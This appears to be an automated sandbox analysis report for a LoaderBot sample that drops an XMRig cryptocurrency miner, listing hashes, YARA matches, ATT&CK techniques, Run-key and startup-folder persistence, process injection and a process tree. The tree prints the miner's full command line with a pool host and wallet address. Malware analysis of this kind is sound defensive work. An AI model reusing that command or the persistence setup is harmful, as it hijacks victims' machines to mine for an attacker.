loaderbot | 170f1bfffbf3fa5ec4cac475209b00e9e8478565c79cb28fa442fabf89ba9079

Analysis

max time kernel
26s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
25-12-2023 14:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

245f2e7c93f989165dc8d410823c4023.exe
Size

1.9MB
MD5

245f2e7c93f989165dc8d410823c4023
SHA1

d82877fdf16e0091957d6ac9cefc638e08694c91
SHA256

170f1bfffbf3fa5ec4cac475209b00e9e8478565c79cb28fa442fabf89ba9079
SHA512

1fbb6fd0f6743e3e595570a4e6fdb3fa0a7bc2a7aed16ce72ad8e349770c1d181e681600381e0ff5016612637a2be632e5e03dae011fe768502a381f95aff865
SSDEEP

49152:pM2OSAUhB0ETI++BrpMLdDQXWb+FPWRjl:pM2DD5IhBrpCFQXk+FPWFl

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

LoaderBot executable 2 IoCs

resource	yara_rule
behavioral2/memory/1032-7-0x0000000000400000-0x00000000007FE000-memory.dmp	loaderbot
behavioral2/memory/1032-15-0x0000000005560000-0x0000000005570000-memory.dmp	loaderbot

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral2/memory/2504-28-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/5016-32-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/5016-33-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/5016-40-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/5016-41-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/5016-43-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/5016-46-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/5016-48-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/5016-49-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	245f2e7c93f989165dc8d410823c4023.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	245f2e7c93f989165dc8d410823c4023.exe

Executes dropped EXE 2 IoCs

pid	Process
2504	Driver.exe
5016	Driver.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\245f2e7c93f989165dc8d410823c4023.exe"	245f2e7c93f989165dc8d410823c4023.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3220 set thread context of 1032	3220	245f2e7c93f989165dc8d410823c4023.exe	94

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe
1032	245f2e7c93f989165dc8d410823c4023.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1032	245f2e7c93f989165dc8d410823c4023.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	3220	245f2e7c93f989165dc8d410823c4023.exe
Token: SeDebugPrivilege	1032	245f2e7c93f989165dc8d410823c4023.exe
Token: SeLockMemoryPrivilege	2504	Driver.exe
Token: SeLockMemoryPrivilege	2504	Driver.exe
Token: SeLockMemoryPrivilege	5016	Driver.exe
Token: SeLockMemoryPrivilege	5016	Driver.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 3220 wrote to memory of 4600	3220	245f2e7c93f989165dc8d410823c4023.exe	91
PID 3220 wrote to memory of 4600	3220	245f2e7c93f989165dc8d410823c4023.exe	91
PID 3220 wrote to memory of 4600	3220	245f2e7c93f989165dc8d410823c4023.exe	91
PID 3220 wrote to memory of 4960	3220	245f2e7c93f989165dc8d410823c4023.exe	92
PID 3220 wrote to memory of 4960	3220	245f2e7c93f989165dc8d410823c4023.exe	92
PID 3220 wrote to memory of 4960	3220	245f2e7c93f989165dc8d410823c4023.exe	92
PID 3220 wrote to memory of 4056	3220	245f2e7c93f989165dc8d410823c4023.exe	93
PID 3220 wrote to memory of 4056	3220	245f2e7c93f989165dc8d410823c4023.exe	93
PID 3220 wrote to memory of 4056	3220	245f2e7c93f989165dc8d410823c4023.exe	93
PID 3220 wrote to memory of 1032	3220	245f2e7c93f989165dc8d410823c4023.exe	94
PID 3220 wrote to memory of 1032	3220	245f2e7c93f989165dc8d410823c4023.exe	94
PID 3220 wrote to memory of 1032	3220	245f2e7c93f989165dc8d410823c4023.exe	94
PID 3220 wrote to memory of 1032	3220	245f2e7c93f989165dc8d410823c4023.exe	94
PID 3220 wrote to memory of 1032	3220	245f2e7c93f989165dc8d410823c4023.exe	94
PID 3220 wrote to memory of 1032	3220	245f2e7c93f989165dc8d410823c4023.exe	94
PID 3220 wrote to memory of 1032	3220	245f2e7c93f989165dc8d410823c4023.exe	94
PID 3220 wrote to memory of 1032	3220	245f2e7c93f989165dc8d410823c4023.exe	94
PID 1032 wrote to memory of 2504	1032	245f2e7c93f989165dc8d410823c4023.exe	96
PID 1032 wrote to memory of 2504	1032	245f2e7c93f989165dc8d410823c4023.exe	96
PID 1032 wrote to memory of 5016	1032	245f2e7c93f989165dc8d410823c4023.exe	101
PID 1032 wrote to memory of 5016	1032	245f2e7c93f989165dc8d410823c4023.exe	101

C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe
"C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3220
- C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe
  C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe
  2⤵
  PID:4600
- C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe
  C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe
  2⤵
  PID:4960
- C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe
  C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe
  2⤵
  PID:4056
- C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe
  C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: RenamesItself
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1032
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49ciCfWrkhQWz6LYXux4LV1P5eAFMfox1H2y3k6VSn7Jb39nDYDUiC6JFCUBDDf63GQqpKc5ZQQ8vCHwgzesAKHtJwB9o2i -p x -k -v=0 --donate-level=1 -t 4
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2504
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49ciCfWrkhQWz6LYXux4LV1P5eAFMfox1H2y3k6VSn7Jb39nDYDUiC6JFCUBDDf63GQqpKc5ZQQ8vCHwgzesAKHtJwB9o2i -p x -k -v=0 --donate-level=1 -t 4
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\245f2e7c93f989165dc8d410823c4023.exe.log

Filesize
605B

MD5
3654bd2c6957761095206ffdf92b0cb9

SHA1
6f10f7b5867877de7629afcff644c265e79b4ad3

SHA256
c2a4be94cf4ed33d698d9838f4ffb47047da796e733ec11562463a1621212ab4

SHA512
e2a81248cca7732ce098088d5237897493fd3629e28d66bc13e5f9191f72cd52893f4a53905906af12d5c6de475738b6c7f6b718a32869e9ee0deb3a54672f79

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
814KB

MD5
22af6897ec3fc97278802246f9341bcc

SHA1
c2dbeb5eab22fcdb1b0b2765439e25ddc15b3921

SHA256
e212f17c0a387df11b5ee18ddcb3873c958deaa7875fcf72a04186bb6c61b1cc

SHA512
4b625c12c9c3d3241e924a69f289962bf9a811812588e0cb184051f4696acacab3f2e38cca7f65603156a41a291932c914347968bbd810587eccadc3cacdb655

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
1.0MB

MD5
3a88ef4e3ec01b118d5fb3d4ad21aae7

SHA1
ae1d4f887ea6f80a0f13a4b7519b1c76d8c1cb97

SHA256
229b53483a6122c77a3ca6c60375993d29bda500cc1b71f93717f49aac755a02

SHA512
acad6e4f8f74f08fc01f658b87b1ac6e8b9ae672dac910975fa8f9c821653049afad9e73f3418fd4f23d0a966f4b65656d3f45f06bf0c7360ed4c6c40f66ac06

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
827KB

MD5
d0aba9f17ef51dd3ce53ceba95097f49

SHA1
dbbc5a9b9ea01f72d9b4a55fcde515712b31bcdd

SHA256
6d38cfd7bacf53ce7d5219e47837795d689a72a84b4f9a81a49e3db38e353bc2

SHA512
72f5414646fb0062df800b2e3c0ab4ccc025aed4fe25633e75b893da79ae96adba50c4e499ac240e81bd52acdb2ee1caeed382cba2e2bfee94c5a44a438c61f3

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
564KB

MD5
2f72fc5e0be9c80e2e8d0e48a6082916

SHA1
1ee65597d5334db5f64c59ca58c554e6a555dc80

SHA256
cba01acc7c262a41a9e3d3f20d28f82b8da20592a3c2b63eefd07c2a8bd82cb6

SHA512
021ed28e1d44046f8b0a483d69e5bc55e7f75c673c4b6e5776eec648304a719071a3943b31e49f760a7b01c577fa284842627e173a7c9ed9340732021249c7e9

Download Submit
memory/1032-12-0x00000000743C0000-0x0000000074B70000-memory.dmp

Filesize
7.7MB

Download
memory/1032-7-0x0000000000400000-0x00000000007FE000-memory.dmp

Filesize
4.0MB

Download
memory/1032-34-0x00000000743C0000-0x0000000074B70000-memory.dmp

Filesize
7.7MB

Download
memory/1032-37-0x0000000005560000-0x0000000005570000-memory.dmp

Filesize
64KB

Download
memory/1032-14-0x0000000005770000-0x00000000057D6000-memory.dmp

Filesize
408KB

Download
memory/1032-15-0x0000000005560000-0x0000000005570000-memory.dmp

Filesize
64KB

Download
memory/2504-27-0x0000000000510000-0x0000000000524000-memory.dmp

Filesize
80KB

Download
memory/2504-28-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2504-26-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3220-1-0x00000000743C0000-0x0000000074B70000-memory.dmp

Filesize
7.7MB

Download
memory/3220-2-0x0000000005490000-0x00000000054A0000-memory.dmp

Filesize
64KB

Download
memory/3220-3-0x0000000005460000-0x0000000005474000-memory.dmp

Filesize
80KB

Download
memory/3220-4-0x0000000005590000-0x0000000005606000-memory.dmp

Filesize
472KB

Download
memory/3220-0-0x0000000000970000-0x0000000000B54000-memory.dmp

Filesize
1.9MB

Download
memory/3220-5-0x0000000005710000-0x000000000572E000-memory.dmp

Filesize
120KB

Download
memory/3220-10-0x00000000743C0000-0x0000000074B70000-memory.dmp

Filesize
7.7MB

Download
memory/5016-33-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-32-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-36-0x0000000002010000-0x0000000002030000-memory.dmp

Filesize
128KB

Download
memory/5016-35-0x0000000001FF0000-0x0000000002010000-memory.dmp

Filesize
128KB

Download
memory/5016-31-0x0000000001FD0000-0x0000000001FF0000-memory.dmp

Filesize
128KB

Download
memory/5016-38-0x0000000002030000-0x0000000002050000-memory.dmp

Filesize
128KB

Download
memory/5016-39-0x0000000002050000-0x0000000002070000-memory.dmp

Filesize
128KB

Download
memory/5016-40-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-41-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-42-0x0000000001FF0000-0x0000000002010000-memory.dmp

Filesize
128KB

Download
memory/5016-43-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-44-0x0000000002010000-0x0000000002030000-memory.dmp

Filesize
128KB

Download
memory/5016-45-0x0000000002030000-0x0000000002050000-memory.dmp

Filesize
128KB

Download
memory/5016-46-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-47-0x0000000002050000-0x0000000002070000-memory.dmp

Filesize
128KB

Download
memory/5016-48-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-49-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-50-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-51-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-52-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-53-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/5016-54-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download